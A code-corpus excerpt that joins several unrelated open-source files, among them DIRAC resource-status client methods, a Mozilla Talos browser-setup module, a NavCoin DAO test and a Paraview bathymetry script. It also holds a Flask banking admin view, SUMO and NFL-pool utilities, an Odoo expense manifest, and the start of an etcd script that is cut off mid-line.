dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Deletes from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query
:return: S_OK() || S_ERROR()
'''
return self._getRPC().delete(element + tableType, self._prepare(locals()))
def addOrModifyStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds or updates-if-duplicated from <element><tableType> and also adds a log
if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def modifyStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None, tokenOwner=None,
tokenExpiration=None):
'''
Updates from <element><tableType> and also adds a log if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def addIfNotThereStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds if-not-duplicated from <element><tableType> and also adds a log if flag
is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addIfNotThere(element + tableType, self._prepare(locals()))
##############################################################################
# Protected methods - Use carefully !!
def notify(self, request, params):
''' Send notification for a given request with its params to the diracAdmin
'''
address = Operations().getValue('ResourceStatus/Notification/DebugGroup/Users')
msg = 'Matching parameters: ' + str(params)
sbj = '[NOTIFICATION] DIRAC ResourceStatusDB: ' + request + ' entry'
NotificationClient().sendMail(address, sbj, msg, address)
def _extermineStatusElement(self, element, name, keepLogs=True):
'''
Deletes from <element>Status,
<element>History
<element>Log
all rows with `elementName`. It removes all the entries, logs, etc..
Use with common sense !
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElements ), any of the defaults: \
`Site` | `Resource` | `Node`
**name** - `[, string, list]`
name of the individual of class element
**keepLogs** - `bool`
if active, logs are kept in the database
:return: S_OK() || S_ERROR()
'''
return self.__extermineStatusElement(element, name, keepLogs)
def __extermineStatusElement(self, element, name, keepLogs):
'''
This method iterates over the three ( or four ) table types - depending
on the value of keepLogs - deleting all matches of `name`.
'''
tableTypes = ['Status', 'History']
if keepLogs is False:
tableTypes.append('Log')
for table in tableTypes:
deleteQuery = self.deleteStatusElement(element, table, name=name)
if not deleteQuery['OK']:
return deleteQuery
return S_OK()
################################################################################
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
| gpl-3.0 | -4,775,719,922,118,156,000 | 38.170604 | 94 | 0.607679 | false |
cstipkovic/spidermonkey-research | testing/talos/talos/ffsetup.py | 1 | 6208 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Set up a browser environment before running a test.
"""
import os
import re
import tempfile
import mozfile
from mozprocess import ProcessHandler
from mozprofile.profile import Profile
from mozlog import get_proxy_logger
from talos import utils
from talos.utils import TalosError
from talos.sps_profile import SpsProfile
LOG = get_proxy_logger()
class FFSetup(object):
"""
Initialize the browser environment before running a test.
This prepares:
- the environment vars for running the test in the browser,
available via the instance member *env*.
- the profile used to run the test, available via the
instance member *profile_dir*.
- sps profiling, available via the instance member *sps_profile*
of type :class:`SpsProfile` or None if not used.
Note that the browser will be run once with the profile, to ensure
this is basically working and negate any performance noise with the
real test run (installing the profile the first time takes time).
This class should be used as a context manager::
with FFSetup(browser_config, test_config) as setup:
# setup.env is initialized, and setup.profile_dir created
pass
# here the profile is removed
"""
PROFILE_REGEX = re.compile('__metrics(.*)__metrics',
re.DOTALL | re.MULTILINE)
def __init__(self, browser_config, test_config):
self.browser_config, self.test_config = browser_config, test_config
self._tmp_dir = tempfile.mkdtemp()
self.env = None
# The profile dir must be named 'profile' because of xperf analysis
# (in etlparser.py). TODO fix that ?
self.profile_dir = os.path.join(self._tmp_dir, 'profile')
self.sps_profile = None
def _init_env(self):
self.env = dict(os.environ)
for k, v in self.browser_config['env'].iteritems():
self.env[k] = str(v)
self.env['MOZ_CRASHREPORTER_NO_REPORT'] = '1'
# for winxp e10s logging:
# https://bugzilla.mozilla.org/show_bug.cgi?id=1037445
self.env['MOZ_WIN_INHERIT_STD_HANDLES_PRE_VISTA'] = '1'
if self.browser_config['symbols_path']:
self.env['MOZ_CRASHREPORTER'] = '1'
else:
self.env['MOZ_CRASHREPORTER_DISABLE'] = '1'
self.env['MOZ_DISABLE_NONLOCAL_CONNECTIONS'] = '1'
self.env["LD_LIBRARY_PATH"] = \
os.path.dirname(self.browser_config['browser_path'])
def _init_profile(self):
preferences = dict(self.browser_config['preferences'])
if self.test_config.get('preferences'):
test_prefs = dict(
[(i, utils.parse_pref(j))
for i, j in self.test_config['preferences'].items()]
)
preferences.update(test_prefs)
# interpolate webserver value in prefs
webserver = self.browser_config['webserver']
if '://' not in webserver:
webserver = 'http://' + webserver
for name, value in preferences.items():
if type(value) is str:
value = utils.interpolate(value, webserver=webserver)
preferences[name] = value
extensions = self.browser_config['extensions'][:]
if self.test_config.get('extensions'):
extensions.append(self.test_config['extensions'])
if self.browser_config['develop'] or \
self.browser_config['branch_name'] == 'Try':
extensions = [os.path.dirname(i) for i in extensions]
profile = Profile.clone(
os.path.normpath(self.test_config['profile_path']),
self.profile_dir,
restore=False)
profile.set_preferences(preferences)
profile.addon_manager.install_addons(extensions)
def _run_profile(self):
command_args = utils.GenerateBrowserCommandLine(
self.browser_config["browser_path"],
self.browser_config["extra_args"],
self.profile_dir,
self.browser_config["init_url"]
)
def browser_log(line):
LOG.process_output(browser.pid, line)
browser = ProcessHandler(command_args, env=self.env,
processOutputLine=browser_log)
browser.run()
LOG.process_start(browser.pid, ' '.join(command_args))
try:
exit_code = browser.wait()
except KeyboardInterrupt:
browser.kill()
raise
LOG.process_exit(browser.pid, exit_code)
results_raw = '\n'.join(browser.output)
if not self.PROFILE_REGEX.search(results_raw):
LOG.info("Could not find %s in browser output"
% self.PROFILE_REGEX.pattern)
LOG.info("Raw results:%s" % results_raw)
raise TalosError("browser failed to close after being initialized")
def _init_sps_profile(self):
upload_dir = os.getenv('MOZ_UPLOAD_DIR')
if self.test_config.get('sps_profile') and not upload_dir:
LOG.critical("Profiling ignored because MOZ_UPLOAD_DIR was not"
" set")
if upload_dir and self.test_config.get('sps_profile'):
self.sps_profile = SpsProfile(upload_dir,
self.browser_config,
self.test_config)
self.sps_profile.update_env(self.env)
def clean(self):
mozfile.remove(self._tmp_dir)
if self.sps_profile:
self.sps_profile.clean()
def __enter__(self):
LOG.info('Initialising browser for %s test...'
% self.test_config['name'])
self._init_env()
self._init_profile()
try:
self._run_profile()
except:
self.clean()
raise
self._init_sps_profile()
LOG.info('Browser initialized.')
return self
def __exit__(self, type, value, tb):
self.clean()
| mpl-2.0 | 83,377,925,997,244,750 | 34.678161 | 79 | 0.597777 | false |
navcoindev/navcoin-core | qa/rpc-tests/dao/003-proposal-accepted.py | 1 | 1541 | #!/usr/bin/env python3
# Copyright (c) 2019 The Navcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import sys, os #include the parent folder so the test_framework is available
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
from test_framework.test_framework import NavCoinTestFramework
from test_framework.cfund_util import *
from dao.given import *
from dao.when import *
from dao.then import *
import time
class CFund003ProposalAccepted(NavCoinTestFramework):
"""It should create a proposal and the network should reject the proposal"""
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = []
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [["-debug=dao"],["-debug=dao"]])
def run_test(self):
self.nodes[0].staking(False)
givenIHaveActivatedTheCFund(self.nodes[0])
givenIHaveDonatedToTheCFund(self.nodes[0], 5000)
keypair = givenIHaveCreatedANewAddress(self.nodes[0])
hash = givenIHaveCreatedAProposal(self.nodes[0], keypair["pubkey"], 5000, 60*60*24, "This is my proposal")
givenIHaveVotedOnTheProposal(self.nodes[0], hash, 'yes')
whenTheVotingCycleEnds(self.nodes[0], 2)
thenTheProposalShouldBeAccepted(self.nodes[0], hash)
if __name__ == '__main__':
CFund003ProposalAccepted().main() | mit | -1,843,502,945,225,359,600 | 32.521739 | 112 | 0.709929 | false |
jasonfleming/asgs | output/paraviewBathyWSE.py | 1 | 7106 | #!/usr/bin/env python
#----------------------------------------------------------------------
# paraviewBathyWSE.py : Visualize bathy and wse simultaneously in
# Paraview.
#----------------------------------------------------------------------
# Copyright(C) 2016 Jason Fleming
#
# This file is part of the ADCIRC Surge Guidance System (ASGS).
#
# The ASGS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASGS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the ASGS. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
from optparse import OptionParser
try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
# C O M M A N D L I N E O P T I O N S
parser = OptionParser()
#parser.add_option("-i", "--interact", dest="interact", default=False,
# action="store_true", help="to enable interaction with data")
#parser.add_option("-o", "--outline", dest="outline", default=False,
# action="store_true", help="to display mesh outline")
parser.add_option("-f", "--frame", dest="frame", default=1,
help="frame to render")
parser.add_option("-m", "--magnification", dest="magnification", default=1,
help="magnification of output image (integer)")
#parser.add_option("-a", "--annotation", dest="annotation", default="null",
# help="text to place in frame")
(options, args) = parser.parse_args()
# R E A D D A T A
fort_63_nc_xmf = XDMFReader( FileName='/home/jason/projects/UNC-ASGS/2016/TableTop/08/nhcConsensus/fort.63.nc.xmf' )
fort_63_nc_xmf.PointArrays = ['sea_surface_height_above_geoid', 'BathymetricDepth']
# W A T E R S U R F A C E E L E V A T I O N
# set coloring for water surface elevation to ERDC rainbow (dark)
wseColorBar_PVLookupTable = GetLookupTableForArray( "sea_surface_height_above_geoid", 1, RGBPoints=[0.0, 0.0, 0.0, 0.423499, 0.6688949999999999, 0.0, 0.119341, 0.529244, 1.3377949999999998, 0.0, 0.238697, 0.634974, 2.00669, 0.0, 0.346853, 0.687877, 2.675585, 0.0, 0.450217, 0.718135, 3.34448, 0.0, 0.553552, 0.664836, 4.01338, 0.0, 0.651087, 0.51931, 4.682274, 0.115846, 0.724788, 0.35285, 5.3511705, 0.326772, 0.781201, 0.140185, 6.020065, 0.522759, 0.79852, 0.0284581, 6.688965, 0.703166, 0.788678, 0.00885023, 7.35786, 0.845121, 0.751141, 0.0, 8.026755, 0.955734, 0.690822, 0.0, 8.69565, 0.995407, 0.56791, 0.0618448, 9.36455, 0.987716, 0.403403, 0.164858, 10.0, 0.980407, 0.247105, 0.262699], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace = 'Lab', ScalarRangeInitialized=1.0 )
wseColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 10.0, 1.0, 0.5, 0.0] )
wseColorBar_PVLookupTable.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
wseColorBar_PVLookupTable.LockScalarRange = 1
# use threshold filter to elimitate the -99999 values from the water
# surface elevation data
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold1 = Threshold()
Threshold1.ThresholdRange = [-99998.0, 100.0]
Threshold1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1 = WarpByScalar()
WarpByScalar1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1.ScaleFactor = 0.0002
DataRepresentation1 = Show()
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'sea_surface_height_above_geoid')
DataRepresentation1.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
DataRepresentation1.LookupTable = wseColorBar_PVLookupTable
# B A T H Y M E T R Y / T O P O G R A P H Y
# need to remove dry areas that are below msl from the visualization
# otherwise they will show up blue in the visualization and look like
# they are underwater
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold2 = Threshold()
Threshold2.Scalars = ['POINTS', 'BathymetricDepth']
Threshold2.ThresholdRange = [-100.0, 0.0]
# use Casey's bathy/topo color bar
bathyColorBar_PVLookupTable = GetLookupTableForArray( "BathymetricDepth", 1, RGBPoints=[-20.0, 0.0, 0.250004, 0.0, -10.0, 0.0, 0.500008, 0.0, -5.0, 0.0, 0.629999, 0.0, -2.0, 0.0, 0.764996, 0.0, -1.0, 0.0, 0.8, 0.0500038, -0.5, 0.0, 0.850004, 0.100008, -0.2, 0.0, 0.900008, 0.149996, -0.1, 0.0, 0.949996, 0.2, 0.0, 0.0, 1.0, 1.0, 0.0001, 1.0, 1.0, 1.0, 0.1, 1.0, 1.0, 1.0, 0.2, 0.0, 1.0, 1.0, 0.5, 0.0, 0.500008, 1.0, 1.0, 0.0, 0.4, 1.0, 2.0, 0.0, 0.299992, 1.0, 5.0, 0.0, 0.2, 1.0, 10.0, 0.0, 0.100008, 1.0, 20.0, 0.0, 0.00999466, 1.0, 50.0, 0.0, 0.0, 1.0, 100.0, 0.0, 0.0, 0.510002], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace='RGB', ScalarRangeInitialized=1.0 )
bathyColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[-66.632401, 0.0, 0.5, 0.0, 0.0, 1.0, 0.5, 0.0] )
bathyColorBar_PVLookupTable.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
WarpByScalar2 = WarpByScalar()
WarpByScalar2.Scalars = ['POINTS', 'BathymetricDepth']
WarpByScalar2.ScaleFactor = -0.0002
DataRepresentation5 = Show()
DataRepresentation5.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation5.SelectionPointFieldDataArrayName = 'BathymetricDepth'
DataRepresentation5.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
DataRepresentation5.ColorArrayName = ('POINT_DATA', 'BathymetricDepth')
DataRepresentation5.ScalarOpacityUnitDistance = 0.11216901957450816
DataRepresentation5.LookupTable = bathyColorBar_PVLookupTable
DataRepresentation5.ScaleFactor = 1.2353294372558594
# T E X T A N N O T A T I O N
#Text1 = Text()
#Text1.Text = 'Hurricane Zack Exercise\nNHC Official Forecast Track\nAdvisory 8'
#DataRepresentation6 = Show()
RenderView1 = GetRenderView()
RenderView1.CameraClippingRange = [102.0, 105.0]
RenderView1.CameraFocalPoint = [-90.5, 29.5, 0.0]
RenderView1.CenterOfRotation = [-90.5, 29.5, 0.0]
RenderView1.CameraParallelScale = 1.6
RenderView1.InteractionMode = '2D'
RenderView1.CameraPosition = [-90.5, 29.5, 103.0]
RenderView1.CenterAxesVisibility = 0 # turn off axes that show center of rotation
#save screenshot
view = GetActiveView()
view.Background = [0.35,0.36,0.45] # dark gray
tsteps = fort_63_nc_xmf.TimestepValues
annTime = AnnotateTimeFilter(fort_63_nc_xmf)
# Show the filter
Show(annTime)
view.ViewTime = tsteps[int(options.frame)]
Render()
frame_file = 'test_%03d.png' % int(options.frame)
WriteImage(frame_file,Magnification=int(options.magnification))
#view.ViewTime = tsteps[100]
#Render()
#WriteImage("newtest3.png",Magnification=4)
# Save the animation to an avi file
#AnimateReader(fort_63_nc_xmf, filename="movie.avi")
| gpl-3.0 | -6,397,047,685,143,120,000 | 53.661538 | 802 | 0.698987 | false |
Pantynopants/DBMS_BANK | app/admin/views.py | 1 | 6292 | # -*- coding=utf-8 -*-
from flask import render_template, flash, redirect, url_for, request, make_response, current_app
from flask_login import login_required, current_user, login_user, logout_user
from forms import *
from ..models import *
from .. import db
from ..utils import db_utils
from . import admin
@admin.route('/')
def index():
# print("1")
return render_template('admin/index.html')
@admin.route('/login', methods=['GET', 'POST'])
def login():
"""
if cookie exists, log in without form
else give an random one
"""
form = LoginForm()
if form.validate_on_submit():
# print(form.username.data)
user = User.User.get_user_by_username(form.username.data)
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(request.args.get('next') or url_for('admin.index'))
else:
flash(u'user do not exist')
# print user, form.password.data
flash(u'log in faild')
return render_template('admin/login.html', form=form)
@admin.route('/register', methods=['GET', 'POST'])
def register():
# register_key = 'zhucema'
form = RegistrationForm()
if form.validate_on_submit() and not User.User.isUserExist(form.username.data):
# if form.registerkey.data != register_key:
# flash(u'注册码不符,请返回重试.')
# return redirect(url_for('admin.register'))
# else:
if form.password.data != form.password2.data:
flash(u'两次输入密码不一')
return redirect(url_for('admin.register'))
else:
user = User.User()
user.username=form.username.data
user.real_name=form.real_name.data
user.password=form.password.data
db_utils.commit_data(db, user)
# print(user.username)
flash(u'您已经注册成功')
return redirect(url_for('admin.login'))
return render_template('admin/register.html', form=form)
@admin.route('/logout')
@login_required
def logout():
logout_user()
flash(u'您已经登出了系统')
redirect_to_index = redirect(url_for('main.index'))
response = current_app.make_response(redirect_to_index )
response.set_cookie('USERID',value="GUEST")
return response
@admin.route('/transaction', methods=['GET', 'POST'])
@login_required
def transaction_modify():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
trans_instance = user.transaction
alist = user.transaction
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
redirect(url_for('admin.index'))
form = PostTransactionForm()
if form.validate_on_submit():
if form.payment.data != None :
if form.payment.data == 'wallet':
if form.wallet.data != None and form.wallet.data != 0:
user.pay_trans(trans=trans_instance, number = form.wallet.data)
# else:
# flash(u'nothing in wallet! use bank card instead!')
# redirect(url_for('admin.transaction'))
elif form.payment.data == 'bank_card':
if form.bank_card.data != None and form.bank_card.data != 0:
user.pay_trans(trans=trans_instance, number = form.bank_card.data)
db.session.commit()
flash(u'pay successful')
return redirect(url_for('admin.index'))
return render_template('admin/pay.html', form=form, list=alist)
@admin.route('/transaction/del', methods=['GET', 'POST'])
@login_required
def transaction_refund():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
# trans_instance = user.transaction
bill_list = user.bank_bill_item
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
return redirect(url_for('admin.index'))
form = PostTransactionReFundForm()
if form.validate_on_submit():
if form.serial_number.data != None:
flag = user.refund_trans(serial_number=int(form.serial_number.data))
else:
flash(u'choose one serial_number first')
return redirect(url_for('admin.index'))
db.session.commit()
if flag:
flash(u'refund successful')
# return redirect(url_for('admin.transaction_refund'))
return render_template('admin/refund.html', form=form, list=bill_list)
@admin.route('/check', methods=['GET', 'POST'])
@login_required
def check():
cost = BankBill.BankBillItem.get_total_money_in_date()
num = BankBill.BankBillItem.get_total_trans_number_in_date()
date = BankBill.BankBillItem.get_date()
bill_list = db.session.query(BankBill.BankBillItem).all()
return render_template('admin/check.html', cost = cost, number = num, data = date, list=bill_list)
# @admin.route('/category', methods=['GET', 'POST'])
# def category():
# clist = Category.query.all()
# form = PostCategoryForm()
# if form.validate_on_submit():
# category = Category(name=form.name.data)
# db.session.add(category)
# flash(u'分类添加成功')
# return redirect(url_for('admin.index'))
# return render_template('admin/category.html', form=form, list=clist)
# @admin.route('/category/del', methods=['GET'])
# @login_required
# def category_del():
# if request.args.get('id') is not None and request.args.get('a') == 'del':
# x = Category.query.filter_by(id=request.args.get('id')).first()
# if x is not None:
# db.session.delete(x)
# db.session.commit()
# flash(u'已经删除' + x.name)
# return redirect(url_for('admin.category'))
# flash(u'请检查输入')
# return redirect(url_for('admin.category'))
| gpl-3.0 | -3,674,240,570,483,265,000 | 33.609195 | 102 | 0.591026 | false |
prcutler/nflpool | nflpool/viewmodels/playerpicks_viewmodel.py | 1 | 4310 | from nflpool.viewmodels.viewmodelbase import ViewModelBase
class PlayerPicksViewModel(ViewModelBase):
def __init__(self):
self.afc_east_winner_pick = None
self.afc_east_second = None
self.afc_east_last = None
self.afc_north_winner_pick = None
self.afc_north_second = None
self.afc_north_last = None
self.afc_south_winner_pick = None
self.afc_south_second = None
self.afc_south_last = None
self.afc_west_winner_pick = None
self.afc_west_second = None
self.afc_west_last = None
self.nfc_east_winner_pick = None
self.nfc_east_second = None
self.nfc_east_last = None
self.nfc_north_winner_pick = None
self.nfc_north_second = None
self.nfc_north_last = None
self.nfc_south_winner_pick = None
self.nfc_south_second = None
self.nfc_south_last = None
self.nfc_west_winner_pick = None
self.nfc_west_second = None
self.nfc_west_last = None
self.afc_qb_pick = None
self.nfc_qb_pick = None
self.afc_rb_pick = None
self.nfc_rb_pick = None
self.afc_rec_pick = None
self.nfc_rec_pick = None
self.afc_sacks_pick = None
self.nfc_sacks_pick = None
self.afc_int_pick = None
self.nfc_int_pick = None
self.afc_wildcard1_pick = None
self.afc_wildcard2_pick = None
self.nfc_wildcard1_pick = None
self.nfc_wildcard2_pick = None
self.afc_pf_pick = None
self.nfc_pf_pick = None
self.specialteams_td_pick = None
def from_dict(self, data_dict):
self.afc_east_winner_pick = data_dict.get("afc_east_winner_pick")
self.afc_east_second = data_dict.get("afc_east_second")
self.afc_east_last = data_dict.get("afc_east_last")
self.afc_north_winner_pick = data_dict.get("afc_north_winner_pick")
self.afc_north_second = data_dict.get("afc_north_second")
self.afc_north_last = data_dict.get("afc_north_last")
self.afc_south_winner_pick = data_dict.get("afc_south_winner_pick")
self.afc_south_second = data_dict.get("afc_south_second")
self.afc_south_last = data_dict.get("afc_south_last")
self.afc_west_winner_pick = data_dict.get("afc_west_winner_pick")
self.afc_west_second = data_dict.get("afc_west_second")
self.afc_west_last = data_dict.get("afc_west_last")
self.nfc_east_winner_pick = data_dict.get("nfc_east_winner_pick")
self.nfc_east_second = data_dict.get("nfc_east_second")
self.nfc_east_last = data_dict.get("nfc_east_last")
self.nfc_north_winner_pick = data_dict.get("nfc_north_winner_pick")
self.nfc_north_second = data_dict.get("nfc_north_second")
self.nfc_north_last = data_dict.get("nfc_north_last")
self.nfc_south_winner_pick = data_dict.get("nfc_south_winner_pick")
self.nfc_south_second = data_dict.get("nfc_south_second")
self.nfc_south_last = data_dict.get("nfc_south_last")
self.nfc_west_winner_pick = data_dict.get("nfc_west_winner_pick")
self.nfc_west_second = data_dict.get("nfc_west_second")
self.nfc_west_last = data_dict.get("nfc_west_last")
self.afc_qb_pick = data_dict.get("afc_qb_pick")
self.nfc_qb_pick = data_dict.get("nfc_qb_pick")
self.afc_rb_pick = data_dict.get("afc_rb_pick")
self.nfc_rb_pick = data_dict.get("nfc_rb_pick")
self.afc_rec_pick = data_dict.get("afc_rec_pick")
self.nfc_rec_pick = data_dict.get("nfc_rec_pick")
self.afc_sacks_pick = data_dict.get("afc_sacks_pick")
self.nfc_sacks_pick = data_dict.get("nfc_sacks_pick")
self.afc_int_pick = data_dict.get("afc_int_pick")
self.nfc_int_pick = data_dict.get("nfc_int_pick")
self.afc_wildcard1_pick = data_dict.get("afc_wildcard1_pick")
self.afc_wildcard2_pick = data_dict.get("afc_wildcard2_pick")
self.nfc_wildcard1_pick = data_dict.get("nfc_wildcard1_pick")
self.nfc_wildcard2_pick = data_dict.get("nfc_wildcard2_pick")
self.afc_pf_pick = data_dict.get("afc_pf_pick")
self.nfc_pf_pick = data_dict.get("nfc_pf_pick")
self.specialteams_td_pick = data_dict.get("specialteams_td_pick")
| mit | 2,485,024,036,205,383,700 | 47.426966 | 75 | 0.623666 | false |
702nADOS/sumo | tools/contributed/sumopy/agilepy/lib_base/logger.py | 1 | 1227 | import types
class Logger:
def __init__(self, filepath=None, is_stdout=True):
self._filepath = filepath
self._logfile = None
self._callbacks = {}
self._is_stdout = is_stdout
def start(self, text=''):
if self._filepath != None:
self._logfile = open(self._filepath, 'w')
self._logfile.write(text + '\n')
else:
self._logfile = None
print text
def add_callback(self, function, key='message'):
self._callbacks[key] = function
def progress(self, percent):
pass
def w(self, data, key='message', **kwargs):
# print 'w:',data,self._callbacks
if self._logfile != None:
self._logfile.write(str(data) + '\n')
elif self._callbacks.has_key(key):
kwargs['key'] = key
self._callbacks[key](data, **kwargs)
# elif type(data)==types.StringType:
# print data
if self._is_stdout:
print str(data)
def stop(self, text=''):
if self._logfile != None:
self._logfile.write(text + '\n')
self._logfile.close()
self._logfile = None
else:
print text
| gpl-3.0 | 895,495,032,246,819,500 | 26.266667 | 54 | 0.519152 | false |
ayepezv/GAD_ERP | addons/hr_expense/__openerp__.py | 2 | 1889 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Expense Tracker',
'version': '2.0',
'category': 'Human Resources',
'sequence': 95,
'summary': 'Expenses Validation, Invoicing',
'description': """
Manage expenses by Employees
============================
This application allows you to manage your employees' daily expenses. It gives you access to your employees’ fee notes and give you the right to complete and validate or refuse the notes. After validation it creates an invoice for the employee.
Employee can encode their own expenses and the validation flow puts it automatically in the accounting after validation by managers.
The whole flow is implemented as:
---------------------------------
* Draft expense
* Submitted by the employee to his manager
* Approved by his manager
* Validation by the accountant and accounting entries creation
This module also uses analytic accounting and is compatible with the invoice on timesheet module so that you are able to automatically re-invoice your customers' expenses if your work by project.
""",
'website': 'https://www.odoo.com/page/expenses',
'depends': ['hr_contract', 'account_accountant', 'report', 'web_tour'],
'data': [
'security/ir.model.access.csv',
'data/hr_expense_data.xml',
'data/hr_expense_sequence.xml',
'wizard/hr_expense_refuse_reason.xml',
'wizard/hr_expense_register_payment.xml',
'views/hr_expense_views.xml',
'security/ir_rule.xml',
'report/report_expense_sheet.xml',
'views/hr_dashboard.xml',
'views/hr_expense.xml',
'views/tour_views.xml',
'views/res_config_views.xml',
'data/web_planner_data.xml',
],
'demo': ['data/hr_expense_demo.xml'],
'installable': True,
'application': True,
}
| gpl-3.0 | -3,994,445,756,238,314,000 | 38.3125 | 244 | 0.661897 | false |
meatballhat/ansible-inventory-hacks | ansible_inventory_hacks/etcd/touch.py | 1 | 2242 | #!/usr/bin/env python
# vim:fileencoding=utf-8
import argparse
import datetime
import os
import socket
import subprocess
import sys
import etcd
from . import DEFAULT_PREFIX
ETCD_KEY_TMPL = '{prefix}/{hostname}/{key}'
USAGE = """%(prog)s [options]
Splat some metadata into etcd!
"""
def main(sysargs=sys.argv[:]):
parser = argparse.ArgumentParser(
usage=USAGE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'hostname', metavar='ANSIBLE_HOSTNAME',
default=os.getenv('ANSIBLE_HOSTNAME'),
help='hostname that is being touched')
parser.add_argument(
